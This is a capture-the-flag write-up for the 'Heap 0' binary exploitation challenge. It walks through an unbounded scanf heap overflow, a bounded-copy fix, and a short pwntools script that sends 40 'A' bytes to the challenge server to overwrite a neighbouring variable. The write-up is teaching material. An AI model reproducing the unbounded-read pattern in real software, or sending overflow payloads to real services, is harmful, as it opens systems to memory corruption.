⚒️ Heap 0
| Category | Author |
|---|---|
| ⚒️ Binary Exploitation | Abrxs, pr1or1tyQ |
Challenge Prompt
Are overflows just a stack concern?
Download the binary here.
Download the source here.
Problem Type
- Buffer Overflow
Solve
We are given the program source code:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FLAGSIZE_MAX 64
// amount of memory allocated for input_data
#define INPUT_DATA_SIZE 5
// amount of memory allocated for safe_var
#define SAFE_VAR_SIZE 5

int num_allocs;
char *safe_var;
char *input_data;

void check_win() {
    // the win condition is that safe_var no longer holds "bico"
    if (strcmp(safe_var, "bico") != 0) {
        printf("\nYOU WIN\n");
        // code removed for brevity
    }
}

// code removed for brevity

void write_buffer() {
    printf("Data for buffer: ");
    fflush(stdout);
    // unbounded read: %s stops only at whitespace, never at INPUT_DATA_SIZE
    scanf("%s", input_data);
}

// code removed for brevity
```
The program is written in C. The scanf call with the %s format specifier in write_buffer is inherently dangerous because it performs no bounds checking.
It keeps writing characters into input_data until it hits a space or a newline, completely ignoring the fact that input_data was only allocated 5 bytes (INPUT_DATA_SIZE at the beginning of the code).
When we run the program we see 2 addresses and their data. If we can overwrite bico, we can get the program to print the flag.
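To show the defect and its fix side by side, here is an added example (not part of the challenge source) that emulates the two heap buffers with a constructed 64-byte arena placed 32 bytes apart, the distance observed in this writeup, and compares the unbounded scanf-style copy with a bounded one:

```c
#include <stdio.h>
#include <string.h>

#define INPUT_DATA_SIZE 5
#define SAFE_VAR_SIZE 5
/* Constructed: a static arena stands in for the heap so the layout is
 * deterministic; 32 is the chunk distance measured in the writeup. */
#define CHUNK_DISTANCE 32

static unsigned char arena[64];
static char *input_data = (char *)arena;
static char *safe_var = (char *)arena + CHUNK_DISTANCE;

/* Put both buffers back into the state the program starts in. */
static void init_buffers(void) {
    memset(arena, 0, sizeof arena);
    strcpy(safe_var, "bico");
}

/* Mirrors scanf("%s", input_data): copies until NUL with no bound. */
static void write_buffer_unbounded(const char *user_input) {
    strcpy(input_data, user_input);
}

/* Hardened form: at most INPUT_DATA_SIZE bytes including the NUL, the same
 * effect as scanf("%4s", input_data) or fgets(input_data, INPUT_DATA_SIZE, stdin). */
static void write_buffer_bounded(const char *user_input) {
    snprintf(input_data, INPUT_DATA_SIZE, "%s", user_input);
}

/* 1 if safe_var still holds "bico" after the write, 0 if it was clobbered. */
static int survives(void (*writer)(const char *), const char *user_input) {
    init_buffers();
    writer(user_input);
    return strcmp(safe_var, "bico") == 0;
}

int main(void) {
    char forty_as[41];
    memset(forty_as, 'A', 40);
    forty_as[40] = '\0';
    printf("unbounded: safe_var %s\n",
           survives(write_buffer_unbounded, forty_as) ? "intact" : "overwritten");
    printf("bounded:   safe_var %s\n",
           survives(write_buffer_bounded, forty_as) ? "intact" : "overwritten");
    return 0;
}
```

With the bounded write, input longer than four characters is simply truncated, so the neighbouring chunk can never be reached.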
We can take our 2 values and put them into a hex calculator like RapidTables to figure out how far apart the locations are:
In this case they are 32 bytes apart. So we need to send 32 A characters to cover the distance, plus the characters we want to write over bico.
You can simply send 40 A characters to the program after picking option 2 and then pick option 4 to print the flag, which is what I did at first.
But I wanted to get some more practice with pwntools so I decided to try that too:
```python
from pwn import *

HOST = 'tethys.picoctf.net'
PORT = 55199

p = remote(HOST, PORT)

# option 2: write to the heap buffer
p.recvuntil(b'Enter your choice: ')
p.sendline(b"2")
p.recvuntil(b'Data for buffer: ')
# 32 bytes to reach safe_var, plus 8 more to overwrite "bico"
p.sendline(b"A" * 40)

# option 4: run the check and print the flag
p.recvuntil(b'Enter your choice: ')
p.sendline(b"4")
print(p.recvall().decode())
```